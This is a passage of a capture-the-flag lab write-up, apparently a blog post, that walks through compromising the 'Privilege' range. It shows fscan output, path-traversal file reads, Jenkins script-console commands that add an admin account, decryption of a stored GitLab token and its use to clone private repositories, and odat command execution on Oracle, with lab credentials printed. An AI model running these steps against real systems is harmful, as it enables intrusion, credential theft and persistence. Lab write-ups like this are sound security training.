{"id":2787,"date":"2023-10-10T23:42:24","date_gmt":"2023-10-10T15:42:24","guid":{"rendered":"https:\/\/fushuling.com\/?p=2787"},"modified":"2023-10-17T17:53:20","modified_gmt":"2023-10-17T09:53:20","slug":"%e6%98%a5%e7%a7%8b%e4%ba%91%e5%a2%83%c2%b7privilege","status":"publish","type":"post","link":"https:\/\/fushuling.com\/index.php\/2023\/10\/10\/%e6%98%a5%e7%a7%8b%e4%ba%91%e5%a2%83%c2%b7privilege\/","title":{"rendered":"\u6625\u79cb\u4e91\u5883\u00b7Privilege"},"content":{"rendered":"\n<p>Key points:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Information disclosure<\/li>\n\n\n\n<li>Jenkins initial admin password<\/li>\n\n\n\n<li>Jenkins admin console RCE<\/li>\n\n\n\n<li>Gitlab API Token<\/li>\n\n\n\n<li>Oracle RCE<\/li>\n\n\n\n<li>SeRestorePrivilege privilege escalation<\/li>\n\n\n\n<li>SPN<\/li>\n\n\n\n<li>Extracting SAM via volume shadow copy<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>fscan64.exe -h 39.99.158.227\n\n   ___                              _\n  \/ _ \\     ___  ___ _ __ __ _  ___| | __\n \/ \/_\\\/____\/ __|\/ __| '__\/ _` |\/ __| |\/ \/\n\/ \/_\\\\_____\\__ \\ (__| | | (_| | (__|   &lt;\n\\____\/     |___\/\\___|_|  \\__,_|\\___|_|\\_\\\n                     fscan version: 1.8.2\nstart infoscan\n(icmp) Target 39.99.158.227   is alive\n&#91;*] Icmp alive hosts len is: 1\n39.99.158.227:135 open\n39.99.158.227:139 open\n39.99.158.227:3306 open\n39.99.158.227:8080 open\n39.99.158.227:80 open\n&#91;*] alive ports len is: 5\nstart vulscan\n&#91;*] NetInfo:\n&#91;*]39.99.158.227\n   &#91;-&gt;]XR-JENKINS\n   &#91;-&gt;]172.22.14.7\n&#91;*] WebTitle: http:\/\/39.99.158.227:8080 code:403 len:548    title:None\n&#91;*] WebTitle: http:\/\/39.99.158.227      code:200 len:54689  title:XR SHOP\n\u5df2\u5b8c\u6210 5\/5\n&#91;*] \u626b\u63cf\u7ed3\u675f,\u8017\u65f6: 57.8079657s<\/code><\/pre>\n\n\n\n<p>Port 80 is XR 
shop and 8080 is Jenkins. The site on 80 is built with WordPress; a directory scan turned up www.zip, and after downloading it I found an arbitrary file read<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/2-6.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"977\" height=\"355\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/2-6.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-2800\"  sizes=\"auto, (max-width: 977px) 100vw, 977px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php\n$logfile = rawurldecode( $_GET&#91;'logfile'] );\n\/\/ Make sure the file exists.\nif ( file_exists( $logfile ) ) {\n  \/\/ Get the content and echo it.\n  $text = file_get_contents( $logfile );\n  echo( $text );\n}\nexit;<\/code><\/pre>\n\n\n\n<p>I tried reading the flag directly and it actually worked; this was probably set up with phpstudy, so the privileges are fairly high<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>http:&#47;&#47;39.99.158.227\/tools\/content-log.php?logfile=..\/..\/..\/..\/..\/..\/..\/..\/..\/Users\/Administrator\/flag\/flag01.txt<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/1-15-1024x191.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/1-15-1024x191.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p>Following the hint, read the Jenkins password<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>http:&#47;&#47;39.99.158.227\/tools\/content-log.php?logfile=C:\\ProgramData\\Jenkins\\.jenkins\\secrets\\initialAdminPassword<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>510235cf43f14e83b88a9f144199655b<\/code><\/pre>\n\n\n\n<p>Then log in<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>http:\/\/39.99.158.227:8080\/login admin:510235cf43f14e83b88a9f144199655b<\/code><\/pre>\n\n\n\n<p>Jenkins has a place where commands can be executed<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>http:&#47;&#47;39.99.158.227:8080\/manage\/script<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/3-3-1024x516.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/3-3-1024x516.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p>Since the privileges are fairly high, I just added a user and connected over RDP<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>println \"net user fushuling qwer1234! \/add\".execute().text\nprintln \"net localgroup administrators fushuling \/add\".execute().text<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/4-3-1024x467.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/4-3-1024x467.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/5-3-1024x585.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/5-3-1024x585.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" style=\"width:840px;height:480px\"\/><\/div><figcaption class=\"wp-element-caption\">Sure enough, it's phpstudy<\/figcaption><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>fscan64.exe -h 172.22.14.7\/24\n\n   ___                              _\n  \/ _ \\     ___  ___ _ __ __ _  ___| | __\n \/ \/_\\\/____\/ __|\/ __| '__\/ _` |\/ __| |\/ \/\n\/ \/_\\\\_____\\__ \\ (__| | | (_| | (__|   &lt;\n\\____\/     |___\/\\___|_|  \\__,_|\\___|_|\\_\\\n                     fscan version: 1.8.2\nstart infoscan\n(icmp) Target 172.22.14.7     is alive\n(icmp) Target 172.22.14.11    is alive\n(icmp) Target 172.22.14.16    is alive\n(icmp) Target 172.22.14.31    is alive\n(icmp) Target 172.22.14.46    is alive\n&#91;*] Icmp alive hosts len is: 5\n172.22.14.7:445 open\n172.22.14.7:3306 open\n172.22.14.46:139 open\n172.22.14.31:139 open\n172.22.14.11:139 open\n172.22.14.7:139 open\n172.22.14.46:135 open\n172.22.14.31:135 open\n172.22.14.11:135 open\n172.22.14.7:135 open\n172.22.14.31:1521 open\n172.22.14.46:445 open\n172.22.14.31:445 open\n172.22.14.11:445 open\n172.22.14.46:80 open\n172.22.14.16:80 open\n172.22.14.7:80 open\n172.22.14.16:22 open\n172.22.14.7:8080 open\n172.22.14.16:8060 open\n172.22.14.11:88 open\n172.22.14.16:9094 open\n&#91;*] alive ports len is: 22\nstart vulscan\n&#91;*] NetInfo:\n&#91;*]172.22.14.7\n   &#91;-&gt;]XR-JENKINS\n   &#91;-&gt;]172.22.14.7\n&#91;*] NetInfo:\n&#91;*]172.22.14.46\n   &#91;-&gt;]XR-0923\n   &#91;-&gt;]172.22.14.46\n&#91;*] NetInfo:\n&#91;*]172.22.14.11\n   &#91;-&gt;]XR-DC\n   &#91;-&gt;]172.22.14.11\n&#91;*] NetInfo:\n&#91;*]172.22.14.31\n   &#91;-&gt;]XR-ORACLE\n   &#91;-&gt;]172.22.14.31\n&#91;*] NetBios: 172.22.14.11    &#91;+]DC XIAORANG\\XR-DC\n&#91;*] NetBios: 172.22.14.46    XIAORANG\\XR-0923\n&#91;*] NetBios: 172.22.14.31   
 WORKGROUP\\XR-ORACLE\n&#91;*] WebTitle: http:\/\/172.22.14.7:8080   code:403 len:548    title:None\n&#91;*] WebTitle: http:\/\/172.22.14.16:8060  code:404 len:555    title:404 Not Found\n&#91;*] WebTitle: http:\/\/172.22.14.46       code:200 len:703    title:IIS Windows Server\n&#91;*] WebTitle: http:\/\/172.22.14.16       code:302 len:99     title:None \u8df3\u8f6curl: http:\/\/172.22.14.16\/users\/sign_in\n&#91;*] WebTitle: http:\/\/172.22.14.16\/users\/sign_in code:200 len:34961  title:Sign in \u00b7 GitLab\n&#91;*] WebTitle: http:\/\/172.22.14.7        code:200 len:54603  title:XR SHOP\n&#91;+] http:\/\/172.22.14.7\/www.zip poc-yaml-backup-file<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>172.22.14.7 this host, already at the highest privilege\n172.22.14.46 XR-0923\n172.22.14.11 XR-DC domain controller\n172.22.14.31 XR-ORACLE\n172.22.14.16 GitLab<\/code><\/pre>\n\n\n\n<p>Since the challenge mentioned something about a Gitlab API Token, I went and looked through<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>C:\/ProgramData\/Jenkins\/.jenkins\/credentials.xml<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/6-3-1024x580.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/6-3-1024x580.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<pre 
 class=\"wp-block-code\"><code>{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm\/GEobmrmLYh}<\/code><\/pre>\n\n\n\n<p>Go back to Jenkins and decrypt it<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>println(hudson.util.Secret.fromString(\"{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm\/GEobmrmLYh}\").getPlainText())<\/code><\/pre>\n\n\n\n<p>This gives the plaintext<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>glpat-7kD_qLH2PiQv_ywB9hz2<\/code><\/pre>\n\n\n\n<p>Next, list the GitLab projects through the API<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>proxychains curl --header \"PRIVATE-TOKEN:glpat-7kD_qLH2PiQv_ywB9hz2\" \"http:\/\/172.22.14.16\/api\/v4\/projects\"<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>&#91;{\n\t\"id\": 6,\n\t\"description\": null,\n\t\"name\": \"Internal Secret\",\n\t\"name_with_namespace\": \"XRLAB \/ Internal Secret\",\n\t\"path\": \"internal-secret\",\n\t\"path_with_namespace\": \"xrlab\/internal-secret\",\n\t\"created_at\": \"2022-12-25T08:30:12.362Z\",\n\t\"default_branch\": \"main\",\n\t\"tag_list\": &#91;],\n\t\"topics\": &#91;],\n\t\"ssh_url_to_repo\": \"git@gitlab.xiaorang.lab:xrlab\/internal-secret.git\",\n\t\"http_url_to_repo\": \"http:\/\/gitlab.xiaorang.lab\/xrlab\/internal-secret.git\",\n\t\"web_url\": \"http:\/\/gitlab.xiaorang.lab\/xrlab\/internal-secret\",\n\t\"readme_url\": null,\n\t\"avatar_url\": null,\n\t\"forks_count\": 0,\n\t\"star_count\": 0,\n\t\"last_activity_at\": \"2022-12-25T08:30:12.362Z\",\n\t\"namespace\": {\n\t\t\"id\": 8,\n\t\t\"name\": \"XRLAB\",\n\t\t\"path\": \"xrlab\",\n\t\t\"kind\": \"group\",\n\t\t\"full_path\": \"xrlab\",\n\t\t\"parent_id\": null,\n\t\t\"avatar_url\": null,\n\t\t\"web_url\": \"http:\/\/gitlab.xiaorang.lab\/groups\/xrlab\"\n\t}\n}, {\n\t\"id\": 4,\n\t\"description\": null,\n\t\"name\": \"XRAdmin\",\n\t\"name_with_namespace\": \"XRLAB \/ XRAdmin\",\n\t\"path\": \"xradmin\",\n\t\"path_with_namespace\": 
\"xrlab\/xradmin\",\n\t\"created_at\": \"2022-12-25T07:48:16.751Z\",\n\t\"default_branch\": \"main\",\n\t\"tag_list\": &#91;],\n\t\"topics\": &#91;],\n\t\"ssh_url_to_repo\": \"git@gitlab.xiaorang.lab:xrlab\/xradmin.git\",\n\t\"http_url_to_repo\": \"http:\/\/gitlab.xiaorang.lab\/xrlab\/xradmin.git\",\n\t\"web_url\": \"http:\/\/gitlab.xiaorang.lab\/xrlab\/xradmin\",\n\t\"readme_url\": \"http:\/\/gitlab.xiaorang.lab\/xrlab\/xradmin\/-\/blob\/main\/README.md\",\n\t\"avatar_url\": null,\n\t\"forks_count\": 0,\n\t\"star_count\": 0,\n\t\"last_activity_at\": \"2023-05-30T10:27:31.762Z\",\n\t\"namespace\": {\n\t\t\"id\": 8,\n\t\t\"name\": \"XRLAB\",\n\t\t\"path\": \"xrlab\",\n\t\t\"kind\": \"group\",\n\t\t\"full_path\": \"xrlab\",\n\t\t\"parent_id\": null,\n\t\t\"avatar_url\": null,\n\t\t\"web_url\": \"http:\/\/gitlab.xiaorang.lab\/groups\/xrlab\"\n\t}\n}, {\n\t\"id\": 3,\n\t\"description\": null,\n\t\"name\": \"Awenode\",\n\t\"name_with_namespace\": \"XRLAB \/ Awenode\",\n\t\"path\": \"awenode\",\n\t\"path_with_namespace\": \"xrlab\/awenode\",\n\t\"created_at\": \"2022-12-25T07:46:43.635Z\",\n\t\"default_branch\": \"master\",\n\t\"tag_list\": &#91;],\n\t\"topics\": &#91;],\n\t\"ssh_url_to_repo\": \"git@gitlab.xiaorang.lab:xrlab\/awenode.git\",\n\t\"http_url_to_repo\": \"http:\/\/gitlab.xiaorang.lab\/xrlab\/awenode.git\",\n\t\"web_url\": \"http:\/\/gitlab.xiaorang.lab\/xrlab\/awenode\",\n\t\"readme_url\": \"http:\/\/gitlab.xiaorang.lab\/xrlab\/awenode\/-\/blob\/master\/README.md\",\n\t\"avatar_url\": null,\n\t\"forks_count\": 0,\n\t\"star_count\": 0,\n\t\"last_activity_at\": \"2022-12-25T07:46:43.635Z\",\n\t\"namespace\": {\n\t\t\"id\": 8,\n\t\t\"name\": \"XRLAB\",\n\t\t\"path\": \"xrlab\",\n\t\t\"kind\": \"group\",\n\t\t\"full_path\": \"xrlab\",\n\t\t\"parent_id\": null,\n\t\t\"avatar_url\": null,\n\t\t\"web_url\": \"http:\/\/gitlab.xiaorang.lab\/groups\/xrlab\"\n\t}\n}, {\n\t\"id\": 2,\n\t\"description\": \"Example GitBook site using GitLab Pages: 
https:\/\/pages.gitlab.io\/gitbook\",\n\t\"name\": \"XRWiki\",\n\t\"name_with_namespace\": \"XRLAB \/ XRWiki\",\n\t\"path\": \"xrwiki\",\n\t\"path_with_namespace\": \"xrlab\/xrwiki\",\n\t\"created_at\": \"2022-12-25T07:44:18.589Z\",\n\t\"default_branch\": \"master\",\n\t\"tag_list\": &#91;],\n\t\"topics\": &#91;],\n\t\"ssh_url_to_repo\": \"git@gitlab.xiaorang.lab:xrlab\/xrwiki.git\",\n\t\"http_url_to_repo\": \"http:\/\/gitlab.xiaorang.lab\/xrlab\/xrwiki.git\",\n\t\"web_url\": \"http:\/\/gitlab.xiaorang.lab\/xrlab\/xrwiki\",\n\t\"readme_url\": \"http:\/\/gitlab.xiaorang.lab\/xrlab\/xrwiki\/-\/blob\/master\/README.md\",\n\t\"avatar_url\": \"http:\/\/gitlab.xiaorang.lab\/uploads\/-\/system\/project\/avatar\/2\/gitbook.png\",\n\t\"forks_count\": 0,\n\t\"star_count\": 0,\n\t\"last_activity_at\": \"2022-12-25T07:44:18.589Z\",\n\t\"namespace\": {\n\t\t\"id\": 8,\n\t\t\"name\": \"XRLAB\",\n\t\t\"path\": \"xrlab\",\n\t\t\"kind\": \"group\",\n\t\t\"full_path\": \"xrlab\",\n\t\t\"parent_id\": null,\n\t\t\"avatar_url\": null,\n\t\t\"web_url\": \"http:\/\/gitlab.xiaorang.lab\/groups\/xrlab\"\n\t}\n}, {\n\t\"id\": 1,\n\t\"description\": \"This project is automatically generated and helps monitor this GitLab instance. 
&#91;Learn more](\/help\/administration\/monitoring\/gitlab_self_monitoring_project\/index).\",\n\t\"name\": \"Monitoring\",\n\t\"name_with_namespace\": \"GitLab Instance \/ Monitoring\",\n\t\"path\": \"Monitoring\",\n\t\"path_with_namespace\": \"gitlab-instance-23352f48\/Monitoring\",\n\t\"created_at\": \"2022-12-25T07:18:20.914Z\",\n\t\"default_branch\": \"main\",\n\t\"tag_list\": &#91;],\n\t\"topics\": &#91;],\n\t\"ssh_url_to_repo\": \"git@gitlab.xiaorang.lab:gitlab-instance-23352f48\/Monitoring.git\",\n\t\"http_url_to_repo\": \"http:\/\/gitlab.xiaorang.lab\/gitlab-instance-23352f48\/Monitoring.git\",\n\t\"web_url\": \"http:\/\/gitlab.xiaorang.lab\/gitlab-instance-23352f48\/Monitoring\",\n\t\"readme_url\": null,\n\t\"avatar_url\": null,\n\t\"forks_count\": 0,\n\t\"star_count\": 0,\n\t\"last_activity_at\": \"2022-12-25T07:18:20.914Z\",\n\t\"namespace\": {\n\t\t\"id\": 2,\n\t\t\"name\": \"GitLab Instance\",\n\t\t\"path\": \"gitlab-instance-23352f48\",\n\t\t\"kind\": \"group\",\n\t\t\"full_path\": \"gitlab-instance-23352f48\",\n\t\t\"parent_id\": null,\n\t\t\"avatar_url\": null,\n\t\t\"web_url\": \"http:\/\/gitlab.xiaorang.lab\/groups\/gitlab-instance-23352f48\"\n\t}\n}]<\/code><\/pre>\n\n\n\n<p>Clone the projects<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>git clone http:\/\/gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16\/xrlab\/internal-secret.git\ngit clone http:\/\/gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16\/xrlab\/xradmin.git\ngit clone http:\/\/gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16\/xrlab\/xrwiki.git<\/code><\/pre>\n\n\n\n<p>The Oracle username and password are in xradmin\/ruoyi-admin\/src\/main\/resources\/application-druid.yml<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/7-3.png'><img class=\"lazyload 
lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/7-3.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code># Data source configuration\nspring:\n    datasource:\n        type: com.alibaba.druid.pool.DruidDataSource\n        driverClassName: oracle.jdbc.driver.OracleDriver\n        druid:\n            # Primary data source\n            master:\n                url: jdbc:oracle:thin:@172.22.14.31:1521\/orcl\n                username: xradmin\n                password: fcMyE8t9E4XdsKf\n            # Replica data source\n            slave:\n                # Replica data source switch, off by default\n                enabled: false\n                url: \n                username: \n                password: \n            # Initial number of connections\n            initialSize: 5\n            # Minimum pool size\n            minIdle: 10\n            # Maximum pool size\n            maxActive: 20\n            # Timeout when waiting to obtain a connection\n            maxWait: 60000\n            # Interval between checks for idle connections that need to be closed, in milliseconds\n            timeBetweenEvictionRunsMillis: 60000\n            # 
Minimum time a connection stays alive in the pool, in milliseconds\n            minEvictableIdleTimeMillis: 300000\n            # Maximum time a connection stays alive in the pool, in milliseconds\n            maxEvictableIdleTimeMillis: 900000\n            # Query used to check whether a connection is valid\n            validationQuery: SELECT 1 FROM DUAL\n            testWhileIdle: true\n            testOnBorrow: false\n            testOnReturn: false\n            webStatFilter: \n                enabled: true\n            statViewServlet:\n                enabled: true\n                # Allowlist; if left empty, all access is allowed\n                allow:\n                url-pattern: \/druid\/*\n                # Console admin username and password\n                login-username: \n                login-password: \n            filter:\n                stat:\n                    enabled: true\n                    # Slow SQL logging\n                    log-slow-sql: true\n                    slow-sql-millis: 1000\n                    merge-sql: true\n                wall:\n                    config:\n                        multi-statement-allow: true\n<\/code><\/pre>\n\n\n\n<p>When connecting with Navicat I got a stupid error<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/8-3.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" 
data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/8-3.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<p>This blog post solves it<\/p>\n\n\n\n<p><a href=\"https:\/\/blog.csdn.net\/qq_38974638\/article\/details\/115069664\">Fix for Oracle ORA-28547:connection to server failed,probable Oracle Net admin error<\/a><\/p>\n\n\n\n<p>Later I found that connecting isn't actually necessary: xradmin has DBA privileges, so odat can execute commands directly. Add an account and RDP in<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>proxychains odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net user fushuling qwer1234! 
\/add'\nproxychains odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net localgroup administrators fushuling \/add'<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/9-3.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/9-3.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\"\/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/10-3-1024x511.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/10\/10-3-1024x511.png\" 